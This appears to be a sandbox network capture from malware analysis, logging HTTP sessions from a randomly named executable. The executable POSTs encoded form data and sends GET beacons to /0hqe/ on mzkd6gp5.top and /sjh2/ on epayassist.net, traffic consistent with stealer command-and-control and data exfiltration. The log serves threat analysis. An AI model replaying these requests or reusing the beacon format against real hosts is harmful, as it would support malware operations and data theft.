10	192.168.2.4	49864	172.67.158.81	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:51:29.856681108 CET	823	OUT	POST /0hqe/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.mzkd6gp5.top Origin: http://www.mzkd6gp5.top Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 224 Referer: http://www.mzkd6gp5.top/0hqe/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee) Data Raw: 67 6e 6c 78 44 78 74 3d 4f 49 6f 56 68 6a 7a 55 67 6f 38 33 69 5a 69 4d 46 63 64 61 66 51 52 33 34 7a 4a 75 6e 56 78 44 55 6c 6c 72 77 2b 4f 6c 70 59 4a 58 6e 34 44 50 6c 71 33 52 6a 31 69 51 30 63 66 70 77 31 67 57 73 30 6a 68 4b 6f 6b 64 59 6e 48 4e 4e 42 6e 36 6a 30 6d 53 71 41 64 51 58 69 74 2f 35 43 48 6a 56 59 42 69 6a 6d 4f 6c 63 6f 2b 4a 71 70 39 31 64 38 56 55 4d 51 65 55 75 63 72 46 38 73 4b 58 63 78 69 7a 77 73 45 66 30 4f 73 6d 34 30 58 51 38 76 56 6d 6b 37 38 6d 38 65 6c 37 41 58 6f 4a 75 31 42 49 7a 65 6a 58 35 33 47 44 71 77 58 63 41 46 6e 69 6d 32 57 72 73 68 32 56 4f 54 6a 75 78 54 65 6f 6e 76 30 4e 44 43 47 61 39 4d 48 73 4c 4d 50 52 37 2b 45 3d Data Ascii: gnlxDxt=OIoVhjzUgo83iZiMFcdafQR34zJunVxDUllrw+OlpYJXn4DPlq3Rj1iQ0cfpw1gWs0jhKokdYnHNNBn6j0mSqAdQXit/5CHjVYBijmOlco+Jqp91d8VUMQeUucrF8sKXcxizwsEf0Osm40XQ8vVmk78m8el7AXoJu1BIzejX53GDqwXcAFnim2Wrsh2VOTjuxTeonv0NDCGa9MHsLMPR7+E=
Dec 11, 2024 04:51:31.383346081 CET	979	IN	HTTP/1.1 404 Not Found Date: Wed, 11 Dec 2024 03:51:31 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c8%2F5kJjrBmek715l2SyUKPjYGc%2Fyb9f3b%2B2uowfXD%2BnYKwH5UohBMkVU6JzvNhI%2B9%2BbPgazFRr%2B%2FDK2qeOmuELlWZyedVgs9wMiLsXZnMf3vBHoLdPKRbw8INlne3Yze566T"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f02844159ac19cb-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2048&min_rtt=2048&rtt_var=1024&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=823&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49870	172.67.158.81	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:51:32.526695967 CET	10905	OUT	POST /0hqe/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.mzkd6gp5.top Origin: http://www.mzkd6gp5.top Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10304 Referer: http://www.mzkd6gp5.top/0hqe/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee) Data Raw: 67 6e 6c 78 44 78 74 3d 4f 49 6f 56 68 6a 7a 55 67 6f 38 33 69 5a 69 4d 46 63 64 61 66 51 52 33 34 7a 4a 75 6e 56 78 44 55 6c 6c 72 77 2b 4f 6c 70 59 42 58 6b 4b 37 50 71 70 66 52 69 31 69 51 2b 38 66 6f 77 31 67 50 73 31 4c 6c 4b 6f 59 4e 59 6b 76 4e 4d 69 66 36 33 57 43 53 6b 41 64 51 4b 53 74 38 30 69 48 32 56 59 52 6d 6a 6d 65 6c 63 6f 2b 4a 71 6f 4e 31 4c 64 56 55 4f 51 65 54 70 63 72 7a 34 73 4b 72 63 31 32 4a 77 73 41 51 30 2f 4d 6d 34 55 6e 51 2b 61 68 6d 37 4c 38 67 76 75 6c 64 41 58 30 57 75 31 73 33 7a 65 2b 36 35 31 61 44 36 58 53 5a 62 30 48 54 31 46 79 69 73 68 4f 33 4a 68 61 74 6f 41 75 75 76 76 49 44 54 54 75 78 6d 2b 43 69 66 70 53 54 75 6f 75 77 74 45 6d 6a 67 79 79 78 66 63 79 38 5a 76 35 75 55 4b 38 76 67 7a 51 32 38 50 2f 6c 64 38 70 6f 44 6d 42 6e 71 4d 6f 43 55 63 54 67 71 47 6a 53 50 2f 48 72 34 71 73 52 79 4f 65 31 75 2b 52 69 43 46 32 68 42 54 67 2f 72 75 4d 31 59 31 7a 71 39 71 37 78 47 5a 30 75 54 79 59 30 33 57 71 34 37 38 39 49 55 69 69 53 53 48 32 76 6b 6b 33 69 61 4f [TRUNCATED] Data Ascii: gnlxDxt=OIoVhjzUgo83iZiMFcdafQR34zJunVxDUllrw+OlpYBXkK7PqpfRi1iQ+8fow1gPs1LlKoYNYkvNMif63WCSkAdQKSt80iH2VYRmjmelco+JqoN1LdVUOQeTpcrz4sKrc12JwsAQ0/Mm4UnQ+ahm7L8gvuldAX0Wu1s3ze+651aD6XSZb0HT1FyishO3JhatoAuuvvIDTTuxm+CifpSTuouwtEmjgyyxfcy8Zv5uUK8vgzQ28P/ld8poDmBnqMoCUcTgqGjSP/Hr4qsRyOe1u+RiCF2hBTg/ruM1Y1zq9q7xGZ0uTyY03Wq4789IUiiSSH2vkk3iaOYd/6Ae9s8wzFSFoEASw6R9T+6kW7SdteHhAZjMnE0HOwgOt9VMLbT65DjZnWhGyVL4bGtOVznvTfPIvpSmESmtiTC5eGzCGwsLNFwl28ZjTt8rmREI/0CChhS190/Via62meujIxBhgyTJdN+y8P+LN6SjfTr1TZvkilC0Fj8iCd0eSUWhFzv2M3s0Uq7IacCAkjg3NMF6pnu4zNECxqNtU/sT5ucvN35x146DKSvpgJo19uBqsZTh/ERaL4DdLLIPJ1jacSsf60ljxpRyaIwaG9PEeNz7sTl9g8F0yXprWe3dOjSftPtdty2MGc69lFEtydvsi6Q1GIbu//zUuA5a2jcKbZn+iFbju6iDBEeFWueaOUPTD8DcYKC6ckT2EKO9+QEEcEHDlX7hf0nFRnLKM7o6RXl48yvLQUjT4wEuXSS2we5JpaA37AAXVtdnpHokhEAFL9WNsAMhRCws+pxbxK9DNrWmCZxvd7vW9l+F/0mIenAhCsH2s9Faaji1FSXwC53yqW+EFuuJ0uVq0M3ljLMqtmtJV/9VjFbf4gr/WlTviaWvFYxyQSzL70Xf+MQD/IaSrzETwK/5Y24Z5W4Hc/JsZ5mmAO3y3Gv74ltHj8xaeZaRfARUleFdkR0yA/fDzFOunX3RgkpVzsaPokegmYZWXqL7SnHs [TRUNCATED]
Dec 11, 2024 04:51:34.128335953 CET	975	IN	HTTP/1.1 404 Not Found Date: Wed, 11 Dec 2024 03:51:33 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VxvZzdny1OjFc0eiEvBQcFx%2B%2B6xr55Y%2F9G%2BRI4lae%2BvGQL8W8EpdeWbGWLy%2FM0%2Fz6MxiCmqb1RXzBxQHOH8xFUKNS4xOaQxcdstuMbFRjAircETNKKhGScyGO1JGNEVvHgd0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0284520bb98cca-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2010&min_rtt=2010&rtt_var=1005&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10905&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
Dec 11, 2024 04:51:34.129868984 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49876	172.67.158.81	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:51:35.175901890 CET	538	OUT	GET /0hqe/?gnlxDxt=DKA1iVPcoZUjyp2kMNYgPydN8TVlv2BCRXxU2Kub3rtTiJbt+pfDiXzRopvp7VMLzDHcJo8PeW6VBgWmqyKjijxSdggTsAG5c4hPlmGpc/Wen6gVL7B2F3s=&Cpbp2=zjh46zEHi HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.mzkd6gp5.top Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
Dec 11, 2024 04:51:36.729027033 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 11 Dec 2024 03:51:36 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q7mTnvEFmMTmwC4v9X3EfT64V60aSnizi2%2FeBU3yJ2V4JWnP3%2BlJhHIhziMH9uTq2CeYocS0tEZlhlxHxkcMSaWIN1iY%2BZUqF5MIrMfUQvPsBpKSjkMERmwIs0lYScXiZ7Bm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0284629b13de96-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1480&min_rtt=1480&rtt_var=740&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=538&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED] Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly
Dec 11, 2024 04:51:36.729120970 CET	85	IN	Data Raw: 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d Data Ascii: error page -->... a padding to disable MSIE and Chrome friendly error page -->
Dec 11, 2024 04:51:36.729680061 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49897	208.91.197.27	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:51:42.490637064 CET	809	OUT	POST /sjh2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.epayassist.net Origin: http://www.epayassist.net Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 204 Referer: http://www.epayassist.net/sjh2/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee) Data Raw: 67 6e 6c 78 44 78 74 3d 56 6d 68 44 46 61 51 2f 55 73 39 48 6a 4c 75 48 72 32 34 2f 5a 59 77 50 70 44 49 78 58 41 58 2f 6e 38 61 35 4b 44 58 4b 4b 34 54 78 72 75 6e 46 4f 41 4b 64 4e 50 73 38 4e 36 68 6a 50 35 50 77 31 47 49 30 32 66 54 61 51 6c 72 77 74 79 4b 77 6a 4f 79 2f 72 34 59 79 2b 74 6c 51 77 70 63 7a 6a 61 76 4f 33 53 46 56 73 4e 2f 77 4b 32 77 37 36 70 5a 6a 64 75 47 48 70 32 36 38 55 45 41 4d 71 77 73 4d 2f 79 43 67 79 31 34 32 71 68 37 62 6f 4f 61 55 46 71 70 42 45 7a 65 41 42 57 63 65 44 78 54 36 6f 51 49 30 6b 48 7a 69 6c 6c 62 35 76 49 52 6c 65 4b 38 30 4e 6a 75 68 6e 66 38 36 78 41 3d 3d Data Ascii: gnlxDxt=VmhDFaQ/Us9HjLuHr24/ZYwPpDIxXAX/n8a5KDXKK4TxrunFOAKdNPs8N6hjP5Pw1GI02fTaQlrwtyKwjOy/r4Yy+tlQwpczjavO3SFVsN/wK2w76pZjduGHp268UEAMqwsM/yCgy142qh7boOaUFqpBEzeABWceDxT6oQI0kHzillb5vIRleK80Njuhnf86xA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49903	208.91.197.27	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:51:45.155157089 CET	829	OUT	POST /sjh2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.epayassist.net Origin: http://www.epayassist.net Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 224 Referer: http://www.epayassist.net/sjh2/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee) Data Raw: 67 6e 6c 78 44 78 74 3d 56 6d 68 44 46 61 51 2f 55 73 39 48 6a 6f 32 48 6e 33 34 2f 49 34 77 49 30 7a 49 78 65 67 58 37 6e 38 57 35 4b 43 6a 61 4b 74 37 78 72 4d 2f 46 50 42 4b 64 4b 50 73 38 47 61 68 69 52 4a 50 42 31 47 45 38 32 65 76 61 51 6b 50 77 74 7a 36 77 6a 2f 79 34 72 6f 59 6e 32 4e 6c 53 2b 4a 63 7a 6a 61 76 4f 33 53 52 7a 73 4e 6e 77 4a 48 41 37 37 49 5a 67 56 4f 47 47 68 57 36 38 51 45 41 79 71 77 74 6a 2f 7a 66 37 79 32 41 32 71 67 4c 62 6f 61 4f 58 50 71 6f 45 41 7a 65 51 53 54 41 61 48 68 32 75 6d 53 6b 7a 74 45 2f 77 67 6a 57 6a 2b 35 77 79 4d 4b 59 48 51 6b 6e 56 71 63 42 7a 71 48 75 4a 37 4b 39 4e 52 66 78 72 4e 4f 51 75 50 39 76 45 45 76 4d 3d Data Ascii: gnlxDxt=VmhDFaQ/Us9Hjo2Hn34/I4wI0zIxegX7n8W5KCjaKt7xrM/FPBKdKPs8GahiRJPB1GE82evaQkPwtz6wj/y4roYn2NlS+JczjavO3SRzsNnwJHA77IZgVOGGhW68QEAyqwtj/zf7y2A2qgLboaOXPqoEAzeQSTAaHh2umSkztE/wgjWj+5wyMKYHQknVqcBzqHuJ7K9NRfxrNOQuP9vEEvM=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49909	208.91.197.27	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:51:47.824281931 CET	10911	OUT	POST /sjh2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.epayassist.net Origin: http://www.epayassist.net Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10304 Referer: http://www.epayassist.net/sjh2/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee) Data Raw: 67 6e 6c 78 44 78 74 3d 56 6d 68 44 46 61 51 2f 55 73 39 48 6a 6f 32 48 6e 33 34 2f 49 34 77 49 30 7a 49 78 65 67 58 37 6e 38 57 35 4b 43 6a 61 4b 74 6a 78 6f 35 6a 46 4a 6d 2b 64 4c 50 73 38 46 61 68 6e 52 4a 50 63 31 47 63 34 32 65 69 74 51 6e 6e 77 73 56 6d 77 72 74 57 34 6c 6f 59 6e 30 4e 6c 54 77 70 64 78 6a 5a 58 4b 33 53 42 7a 73 4e 6e 77 4a 45 59 37 74 70 5a 67 58 4f 47 48 70 32 36 34 55 45 41 4a 71 7a 64 5a 2f 7a 62 72 75 58 67 32 70 41 62 62 76 70 6d 58 4e 4b 6f 47 4e 54 66 50 53 54 46 45 48 68 71 69 6d 57 6b 56 74 44 33 77 68 6c 58 61 35 49 55 56 53 49 41 37 4d 46 2f 6f 6c 39 74 77 68 32 61 39 2f 66 6f 5a 4c 4d 64 6b 49 63 49 68 54 39 48 48 53 61 6d 51 38 69 6e 62 59 46 35 52 59 44 57 63 72 75 72 50 70 76 79 51 76 44 61 6d 72 67 75 58 4e 4d 58 65 41 39 61 2f 30 4a 33 50 53 48 55 6c 2f 32 35 48 57 75 70 4a 68 51 78 72 31 2f 5a 31 4d 31 79 51 46 59 36 38 76 74 34 48 34 37 4d 6f 2b 4e 32 6d 59 64 42 62 63 46 68 37 56 42 57 54 38 68 47 78 4d 69 71 79 52 69 48 34 71 41 73 70 30 78 54 46 4f 65 [TRUNCATED] Data Ascii: gnlxDxt=VmhDFaQ/Us9Hjo2Hn34/I4wI0zIxegX7n8W5KCjaKtjxo5jFJm+dLPs8FahnRJPc1Gc42eitQnnwsVmwrtW4loYn0NlTwpdxjZXK3SBzsNnwJEY7tpZgXOGHp264UEAJqzdZ/zbruXg2pAbbvpmXNKoGNTfPSTFEHhqimWkVtD3whlXa5IUVSIA7MF/ol9twh2a9/foZLMdkIcIhT9HHSamQ8inbYF5RYDWcrurPpvyQvDamrguXNMXeA9a/0J3PSHUl/25HWupJhQxr1/Z1M1yQFY68vt4H47Mo+N2mYdBbcFh7VBWT8hGxMiqyRiH4qAsp0xTFOeDNzhdnrPZZGmuJhWG6o5CWCcGvUXLmehAJtTL756RVM6uLIFDSVpXXeGLbj6DYTz091Jleqdr0KeU+m++QuID+hqvIHlWFQr1ecJHUGlI9cnlnYe57HTWK5OZD83FcnZwAHI1SwkE0GpBAPSbW4hv6qmxeBYRJOqkuwd94VfdgX5TtFCwaJMmzqe8ne97R8QFEtfmtJ2QXDB82FWftGNc3nD2NgPQpbKvbT7d4gUDUMste+V+1XMRNfkwihNGlMzi0TVdA49fBi5G1a38KSRkIe5X4uoLdA3Te6FGrN8f2IY02CwTSDdECUxrji1ouRYp3Gny2/kOjwASJqqDVizb641SSqEnkTOBHTsca/5qUnCcov4kKjSM057ZeJ26+RUGB/2AfdZy0o2Ih8WA4ja+L/GEVBUOZfa7ndCaOwqforX7byA72gEzGq/0wd6Z1bcsb3uboT3PzsmBI9DsMc0Mib5Qxayvr8pozajNaAhkx943SBdOFvF97UaXnVo0RONPkbfaTjtRdD86zaDX9zERk27HfSB3sKvNHnKnbK5neFXLEU4BOkQ4i0uHeYLTWE39OC2C6Z/BlaMSQ7o1rzPwo+FeBkpK4FTbRgwsFkjWs3kwjCXnxEipEBDAXJzgWvAAnpHAdDQkepq8kfy3UdWiPmriABQXXNSBT [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49915	208.91.197.27	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:51:50.473486900 CET	540	OUT	GET /sjh2/?gnlxDxt=YkJjGs4lbp5ts7eeq38ve60glEoSeBv7n+jiAmf9K/aJhMvSfAmkEslPX5dpK+rGqB8Vqcj9eGPLpji1qr6bjKpF389iooxy/bfE0yZvpr3FHFNGtOhSTJw=&Cpbp2=zjh46zEHi HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.epayassist.net Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
Dec 11, 2024 04:51:51.917220116 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 03:51:51 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") Set-Cookie: vsid=911vr4814347115532532; expires=Mon, 10-Dec-2029 03:51:51 GMT; Max-Age=157680000; path=/; domain=www.epayassist.net; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NN4qSiNia1AnbKNGDqeny2KROq2EoLbUhLjoxm2zR1oRCS/z4bto9oCA9fQ9Z0d7atWEHG2gH8l5jwaHEv42Kw== Content-Length: 2610 Content-Type: text/html; charset=UTF-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 4e 4e 34 71 53 69 4e 69 61 31 41 6e 62 4b 4e 47 44 71 65 6e 79 32 4b 52 4f 71 32 45 6f 4c 62 55 68 4c 6a 6f 78 6d 32 7a 52 31 6f 52 43 53 2f 7a 34 62 74 6f 39 6f 43 41 39 66 51 39 5a 30 64 37 61 74 57 45 48 47 32 67 48 38 6c 35 6a 77 61 48 Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NN4qSiNia1AnbKNGDqeny2KROq2EoLbUhLjoxm2zR1oRCS/z4bto9oCA9fQ9Z0d7atWEHG2gH8l5jwaH
